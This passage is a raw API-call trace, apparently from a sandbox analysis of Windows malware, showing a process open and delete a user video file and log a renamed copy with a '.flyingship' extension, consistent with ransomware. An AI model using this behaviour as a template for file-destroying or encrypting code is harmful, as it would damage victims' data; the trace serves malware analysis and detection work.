ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x6c66c1b0, ftLastWriteTime.dwHighDateTime=0x1d5e6cf, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="J9c7.avi", cAlternateFileName="")) returned 0x90af58 [0199.629] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0199.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0199.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.629] CharLowerBuffW (in: lpsz="byte[17926]", cchLength=0xb | out: lpsz="byte[17926]") returned 0xb [0199.629] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0199.629] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0199.630] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.630] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0199.630] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0199.631] FreeLibrary (hLibModule=0x75c90000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.631] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0199.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0199.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0199.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0199.632] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0199.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0199.632] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0199.642] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0199.642] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.643] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\j9c7.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0199.643] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0199.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0199.643] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0199.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.643] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.644] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.644] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0199.644] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.644] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0199.644] FreeLibrary (hLibModule=0x75990000) returned 1 [0199.644] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFilePart=0x0) returned 0x3b [0199.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x1be41fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="J9c7.avi", cAlternateFileName="")) returned 0x90af58 [0199.644] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z58zbpazzgtth\\j9c7.avi")) returned 1 [0199.646] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9f0b07b0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x6c66c1b0, ftLastAccessTime.dwHighDateTime=0x1d5e6cf, ftLastWriteTime.dwLowDateTime=0x1be41fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4606, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="J9c7.avi", cAlternateFileName="")) returned 0 [0199.646] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0199.646] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0199.647] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.647] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0199.647] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0199.647] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0199.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0199.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0199.648] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.648] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.648] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0199.648] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0199.648] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0199.649] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0199.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0199.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0199.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.649] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0199.649] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3f7e, lpOverlapped=0x0) returned 1 [0199.650] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0199.650] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3f7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.650] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0199.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0199.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0199.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x49) returned 0x923b28 [0199.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\n", cchWideChar=73, lpMultiByteStr=0x923b28, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\n", lpUsedDefaultChar=0x0) returned 73 [0199.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0199.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0199.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.650] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x48, lpOverlapped=0x0) returned 1 [0199.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0199.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0199.651] CloseHandle (hObject=0x158) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.662] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.662] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.664] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.664] HeapFree (in: hHeap=0x8a0000, 